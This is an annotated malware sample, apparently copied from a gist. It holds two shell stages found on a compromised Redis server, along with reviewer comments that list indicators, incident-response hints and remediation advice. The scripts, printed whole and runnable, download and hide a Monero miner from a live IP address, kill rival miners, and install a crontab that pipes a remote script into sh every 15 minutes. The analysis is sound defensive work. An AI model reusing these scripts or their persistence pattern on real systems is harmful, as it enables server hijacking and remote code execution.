Backdoor found on a Redis server: two shell stages that install a cryptominer and a crontab entry re-fetching and executing a remote script every 15 minutes (a remote-code-execution channel, not just a miner)
# NOTE(review): annotated malware sample (stage "Circle_AA.png") — do not run.
# This is the script the installed crontab re-fetches every 15 minutes (see the
# second script below). It (re)downloads the miner and its config and restarts
# them if the miner is not already running. The trailing " | |" on each line is
# table residue from the gist page extraction, not script syntax.
#
# Indicators, all taken from the lines below:
#   Payload / C2 host : 185.169.198.42, plain HTTP (no TLS, no integrity check)
#   Dropped files     : /tmp/Circle_MI.png  (an executable despite the .png name:
#                       it is chmod +x'ed and exec'ed), /tmp/Circle_CF.png (config)
#   Process           : /tmp/Circle_MI.png -c /tmp/Circle_CF.png -k, started with
#                       nohup in the background; both files are deleted 10 s later,
#                       so the running process has a deleted executable.
# IR hints: before killing the process, capture /proc/<pid>/exe (if it is a native
# binary; for a script, /proc/<pid>/cmdline shows the interpreter) and
# /proc/<pid>/cmdline; hunt with `ls -l /proc/[0-9]*/exe 2>/dev/null | grep deleted`,
# `crontab -l` for every user, and outbound connections to 185.169.198.42.
# The gist title attributes this to a Redis server; the initial-access vector is
# not part of these scripts (commonly an unauthenticated Redis instance abused to
# write a crontab) — confirm from Redis config/logs and lock the instance down as
# part of remediation, or it will simply be reinfected.
# get from (original delivery command as recorded by the gist author): | |
# curl http://185.169.198.42/assets/Circle_AA.png|sh | |
# System bin dirs are appended to PATH — presumably so wget/curl resolve under
# cron's minimal environment, since this stage runs from cron.
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin | |
AGENT_FILE='/tmp/Circle_MI.png' | |
AGENT_CONFIG='/tmp/Circle_CF.png' | |
# "Already running?" check: $? is the status of the final `grep -v grep`, which
# is non-zero when no ps line mentions /tmp/Circle_MI.png.
ps -ef|grep $AGENT_FILE|grep -v grep | |
if [ $? -ne 0 ]; then | |
# wget is preferred, curl is the fallback; with neither present it exits quietly.
# Both downloads are unauthenticated HTTP and are not verified in any way.
if [ -x /usr/bin/wget ] ; then | |
wget -q http://185.169.198.42/assets/Circle_MI.png -O $AGENT_FILE | |
wget -q http://185.169.198.42/assets/Circle_CF.png -O $AGENT_CONFIG | |
elif [ -x /usr/bin/curl ] ; then | |
curl -o $AGENT_FILE http://185.169.198.42/assets/Circle_MI.png | |
curl -o $AGENT_CONFIG http://185.169.198.42/assets/Circle_CF.png | |
else | |
exit 0; | |
fi | |
# Launch detached with all output discarded. The meaning of "-c <config> -k"
# belongs to the miner binary and is not visible here.
chmod +x $AGENT_FILE | |
nohup $AGENT_FILE -c $AGENT_CONFIG -k > /dev/null 2>&1 & | |
# Anti-forensics: wait for the process to start, then unlink binary and config.
# The process keeps running from the unlinked inode; nothing is left on disk.
sleep 10 | |
rm -rf $AGENT_FILE | |
rm -rf $AGENT_CONFIG | |
fi |
# NOTE(review): annotated malware sample (stage "Circle_JJ.png") — do not run.
# This is the installer / "competitor eviction" stage: it kills rival miners
# (long kill list below), then, via DoMine, installs this campaign's miner and a
# crontab that re-runs Circle_AA.png every 15 minutes. Same delivery pattern as
# the first stage: fetched over plain HTTP and piped straight into sh.
# The trailing " | |" on each line is gist-page table residue, not shell syntax.
# get from (original delivery command as recorded by the gist author): | |
# curl http://185.169.198.42/assets/Circle_JJ.png | sh | |
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin | |
# Whole days since the Unix epoch. Its only use is the kill line further down
# (`grep ${days}` against `ps auxf`). Why a rival process would be identified by
# that number is not visible here — possibly a competing miner that embeds the
# day count in its name or arguments; TODO confirm. Note the grep is a plain
# substring match over the entire ps line, so any PID or argument containing
# those digits is killed as well.
days=$(($(date +%s) / 60 / 60 / 24)) | |
# DoMine: (re)install the miner and the cron persistence.
# Called only from the last line of the script, when no ps line contains "11231".
# Side effects: deletes /tmp/Circle_*, writes /tmp/Circle_MI.png and
# /tmp/Circle_CF.png (deleting them again 10 s after launch), leaves a detached
# miner running, and REPLACES the invoking user's crontab. The `exit 0` calls
# inside the function terminate the whole script when neither wget nor curl is
# present. Note that the crontab is only installed in the "not already running"
# branch — an already-running miner does not get its persistence refreshed here.
DoMine() | |
{ | |
# Clear any previous staging files before checking/downloading.
rm -rf /tmp/Circle_* | |
# Skip download and launch when the miner already appears in ps.
ps -ef|grep Circle_MI.png|grep -v grep | |
if [ $? -ne 0 ]; then | |
# Unverified plain-HTTP download; wget preferred, curl fallback.
if [ -x /usr/bin/wget ] ; then | |
wget -q http://185.169.198.42/assets/Circle_MI.png -O /tmp/Circle_MI.png | |
wget -q http://185.169.198.42/assets/Circle_CF.png -O /tmp/Circle_CF.png | |
elif [ -x /usr/bin/curl ] ; then | |
curl -o /tmp/Circle_MI.png http://185.169.198.42/assets/Circle_MI.png | |
curl -o /tmp/Circle_CF.png http://185.169.198.42/assets/Circle_CF.png | |
else | |
exit 0; | |
fi | |
# Same launch-then-unlink pattern as Circle_AA.png: binary and config are
# removed 10 s after start, leaving a process whose executable is deleted.
# Capture /proc/<pid>/exe before killing it if you need the sample.
chmod +x /tmp/Circle_MI.png | |
nohup /tmp/Circle_MI.png -c /tmp/Circle_CF.png -k > /dev/null 2>&1 & | |
sleep 10 | |
rm -rf /tmp/Circle_MI.png | |
rm -rf /tmp/Circle_CF.png | |
# Persistence: a crontab line that fetches Circle_AA.png over plain HTTP and
# pipes it into sh every 15 minutes. This is the actual backdoor — whatever the
# server returns at that URL is executed, so the payload can be swapped
# server-side at any time, and an on-path attacker on the unencrypted fetch
# could do the same. Staged through the predictable path /tmp/.cron.
if [ -x /usr/bin/wget ] ; then | |
echo '*/15 * * * * wget -q http://185.169.198.42/assets/Circle_AA.png -O - |sh' > /tmp/.cron | |
elif [ -x /usr/bin/curl ] ; then | |
echo '*/15 * * * * curl http://185.169.198.42/assets/Circle_AA.png|sh' > /tmp/.cron | |
else | |
exit 0; | |
fi | |
# `crontab -r` wipes the user's existing crontab before the new one is loaded.
# IR: any legitimate cron jobs of the user this ran as are gone and must be
# restored from backup/config management; they cannot be recovered from the host.
crontab -r | |
crontab /tmp/.cron | |
sleep 3 | |
rm /tmp/.cron | |
fi | |
} | |
# Competitor eviction: SIGKILL every process whose `ps auxf` line (column 2 is
# the PID) or full command line (`pkill -f`) matches one of the patterns below.
# All patterns are substring matches, so collateral kills are likely: "miner",
# "xmr", "yam", "monero", "stratum" match any unrelated command line containing
# those letters, and `pkill -f curl` kills every running curl on the host —
# an administrator's, and possibly the `curl … | sh` delivering this very script
# if it has not yet exited. The 95-character strings beginning with "4" look
# like Monero wallet addresses of rival campaigns; the hostnames are Monero
# mining pools. Treat this list as rival-campaign IOCs, not as remediation.
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9 | |
# Real kernel kworker threads are not affected by kill -9 from user space; this
# presumably targets user-space miners that name themselves "kworker" to blend in.
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9 | |
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4 | |
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB | |
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df | |
pkill -f cpuloadtest | |
pkill -f crypto-pool | |
pkill -f xmr | |
pkill -f prohash | |
pkill -f monero | |
pkill -f miner | |
pkill -f nanopool | |
pkill -f minergate | |
pkill -f yam | |
pkill -f yam2 | |
pkill -f minerd | |
# This also kills the campaign's OWN miner (its command line, as launched in
# DoMine, contains /tmp/Circle_MI.png), so together with the "11231" check at
# the bottom the miner is normally restarted on every run of this script.
pkill -f Circle_MI.png | |
pkill -f curl | |
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9 | |
# "[email protected]" is an artifact of the page's e-mail-address obfuscation:
# the original pattern (probably a wallet@pool or user@pool login string) is
# not recoverable from this copy of the script.
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9 | |
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9 | |
# Trigger: run DoMine unless some ps line contains "11231". That string is not
# defined anywhere in these two scripts — presumably something in the miner's
# runtime command line or config (a pool port?); confirm against Circle_CF.png.
# Because the own miner was just killed by `pkill -f Circle_MI.png`, this branch
# typically ends up calling DoMine (unless an unrelated PID/argument happens to
# contain 11231, in which case the host is left without a running miner).
ps auxf|grep -v grep|grep "11231" || DoMine |
We found these same scripts on our server too, sadly. :(